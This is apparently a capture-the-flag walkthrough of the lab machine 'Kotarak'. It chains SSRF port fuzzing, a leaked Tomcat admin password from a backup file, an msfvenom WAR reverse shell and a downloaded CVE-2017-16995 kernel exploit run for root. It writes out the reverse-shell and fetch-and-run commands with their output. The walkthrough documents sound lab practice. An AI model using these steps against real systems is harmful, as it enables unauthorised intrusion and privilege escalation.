I started this machine by first running an Nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# Nmap 7.91 scan initiated Tue Jan 26 13:40:52 2021 as: nmap -p- -sC -sV -oN scan -O 10.10.10.55
Nmap scan report for 10.10.10.55
Host is up (0.021s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
| 256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_ 256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
| ajp-methods:
| Supported methods: GET HEAD POST PUT DELETE OPTIONS
| Potentially risky methods: PUT DELETE
|_ See https://nmap.org/nsedoc/scripts/ajp-methods.html
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Kotarak Web Hosting
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=1/26%OT=22%CT=1%CU=39727%PV=Y%DS=2%DC=I%G=Y%TM=6010628
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10C%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 26 13:42:18 2021 -- 1 IP address (1 host up) scanned in 86.08 seconds
We can see there are multiple ports open. I started by investigating port 60000 which bought me to a page which allowed browsing to other pages through the web form.
I entered the localhost address for port 8080, which was the other open port found on the Nmap scan. It was successful in browsing to this page through the form. The HTTP request was:
1
http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1:8080
I then decided to use WFUZZ to attempt to connect to other ports hosted on the machine which were not listening externally.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# wfuzz -z range,0-65535 --hl 2 http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ 1 ⚙
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.55:60000/url.php?path=http://127.0.0.1:FUZZ
Total requests: 65536
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000023: 200 4 L 4 W 62 Ch "22"
000000091: 200 11 L 18 W 156 Ch "90"
000000111: 200 17 L 24 W 187 Ch "110"
000000201: 200 3 L 2 W 22 Ch "200"
000000321: 200 26 L 109 W 1232 Ch "320"
000000889: 200 78 L 265 W 3955 Ch "888"
000003307: 200 3 L 7 W 123 Ch "3306"
000060001: 200 78 L 130 W 1171 Ch "60000"
Total time: 0
Processed Requests: 65536
Filtered Requests: 65528
Requests/sec.: 0
As you can see from the output, there was a number of pages returned. The one of interest was on port 888 which returned a Simple File Viewer:
The backup file on the page appears to be of a significant size. Looking at the source I could see to access this page the php parameter ?doc=backup was required.
1
<td class="tableElement"><a href="?doc=backup" class="tableElement">backup</a></td>
Because of the layered requests through the browser not returning the correct result i had to forward the request to burp to URL encode the request. I sent the following request using BURP repeater to get the backup file.
1
GET /url.php?path=http%3a//127.0.0.1%3a888%3fdoc%3dbackup HTTP/1.1
The backup file was successfully returned:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
HTTP/1.1 200 OK
Date: Sat, 30 Jan 2021 18:31:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 2271
Connection: close
Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users xmlns="http://tomcat.apache.org/xml"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd"
version="1.0">
<!--
NOTE: By default, no user is included in the "manager-gui" role required
to operate the "/manager/html" web application. If you wish to use this app,
you must define such a user - the username and password are arbitrary. It is
strongly recommended that you do NOT use one of the users in the commented out
section below since they are intended for use with the examples web
application.
-->
<!--
NOTE: The sample user and role entries below are intended for use with the
examples web application. They are wrapped in a comment and thus are ignored
when reading this file. If you wish to configure these users for use with the
examples web application, do not forget to remove the <!.. ..> that surrounds
them. You will also need to set the passwords to something appropriate.
-->
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
-->
<user username="admin" password="3@g01PdhB!" roles="manager,manager-gui,admin-gui,manager-script"/>
</tomcat-users>
Near the bottom of the response a username and password is provided.
I knew from past experience that Tomcat tends to have a management page at http://10.10.10.55:8080/manager/html
I browsed to this page hosted through port 8080 and was greeting with a login prompt. I entered the details provided in the backup file and successfully logged in.
You are able to get RCE through this Tomcat Web Application Manager by uploading a WAR reverse shell. I created a WAR reverse shell using MSFVENOM:
1
2
3
4
┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.14.15 lport=2600 -f war > shell.war
Payload size: 1091 bytes
Final size of war file: 1091 bytes
I then uploaded this file using the deployment feature in the Tomcat application manger.
Once uploaded the shell appears on the application list as seen in the screenshot. I started a netcat lister on my kali machine:
1
2
3
4
5
┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# nc -nvlp 2600 130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600
The shell was then executed by clicking the link in the application list:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌──(root💀kali)-[/home/kali/Documents/kotarak]
└─# nc -nvlp 2600 130 ⨯
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::2600
Ncat: Listening on 0.0.0.0:2600
Ncat: Connection from 10.10.10.55.
Ncat: Connection from 10.10.10.55:33422.
ls
backups
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
As you can see from the output, the reverse shell was succesfully captured. I then ran “UNAME – A” to get the kernal version:
1
2
3
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# uname -a
uname -a
Linux kotarak-dmz 4.4.0-83-generic #106-Ubuntu SMP Mon Jun 26 17:54:43 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
I could see that 4.4.0-83-generic was being used. As EXPLOIT exists for this kernel which esclated privilages to root. I downloaded the exploit and compiled it on my kali machine.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[/var/www]
└─# wget https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
--2021-01-30 13:13:39-- https://raw.githubusercontent.com/SecWiki/linux-kernel-exploits/master/2017/CVE-2017-16995/upstream44.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.60.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.60.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5776 (5.6K) [text/plain]
Saving to: ‘upstream44.c’
upstream44.c 100%[=======================================================================================================================================>] 5.64K --.-KB/s in 0.007s
2021-01-30 13:13:39 (757 KB/s) - ‘upstream44.c’ saved [5776/5776]
┌──(root💀kali)-[/var/www]
└─# gcc -o pwned upstream44.c
I then hosted the binary through HTTP and downloaded it to the kotarak machine and executed it:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
tomcat@kotarak-dmz:/tmp$ wget http://10.10.14.15:8000/pwned
wget http://10.10.14.15:8000/pwned
--2021-01-30 13:13:57-- http://10.10.14.15:8000/pwned
Connecting to 10.10.14.15:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 17880 (17K) [application/octet-stream]
Saving to: ‘pwned’
pwned 100%[===================>] 17.46K 81.9KB/s in 0.2s
2021-01-30 13:13:57 (81.9 KB/s) - ‘pwned’ saved [17880/17880]
tomcat@kotarak-dmz:/tmp$ chmod +x pwned
chmod +x pwned
tomcat@kotarak-dmz:/tmp$ ./pwned
./pwned
task_struct = ffff880037660e00
uidptr = ffff88003562c904
spawning root shell
root@kotarak-dmz:/root# cd /home
cd /home
root@kotarak-dmz:/home# ls
ls
atanas tomcat
root@kotarak-dmz:/home# cd atanas
cd atanas
root@kotarak-dmz:/home/atanas# ls
ls
user.txt
root@kotarak-dmz:/home/atanas# cat user.txt
cat user.txt
[REDACTED}
The execution was successful and I was able to navigate to the atanas user and capture the user flag. I tried also to navigate to the root directory but the root flag wasnt present:
1
2
3
4
5
6
7
8
root@kotarak-dmz:/tmp# cd /root
cd /root
root@kotarak-dmz:/root# ls
ls
app.log flag.txt
root@kotarak-dmz:/root# cat flag.txt
cat flag.txt
Getting closer! But what you are looking for can't be found here.
I used the find command to search for the location of the root.txt flag:
1
2
3
4
5
6
7
8
root@kotarak-dmz:/# find . -name "root.txt"
find . -name "root.txt"
.................................
find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.allow’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/system.slice/system-systemd\\x2dfsck.slice/devices.deny’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.allow’: Permission denied
find: ‘./var/lib/lxcfs/cgroup/devices/user.slice/devices.deny’: Permission denied
./var/lib/lxc/kotarak-int/rootfs/root/root.txt
We can see from the bottom line of the output that it where the root flag was located.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@kotarak-dmz:/# cd /var
cd /var/
root@kotarak-dmz:/var# cd lib
cd lib
root@kotarak-dmz:/var/lib# cd lxc
cd lxc
root@kotarak-dmz:/var/lib/lxc# cd kotarak-int
cd kotarak-int
root@kotarak-dmz:/var/lib/lxc/kotarak-int# cd rootfs
cd rootfs
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs# cd root
cd root
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# ls
ls
root.txt
root@kotarak-dmz:/var/lib/lxc/kotarak-int/rootfs/root# cat root.txt
cat root.txt
[REDACTED]
With the root flag location I was able to capture the root flag sucessfully.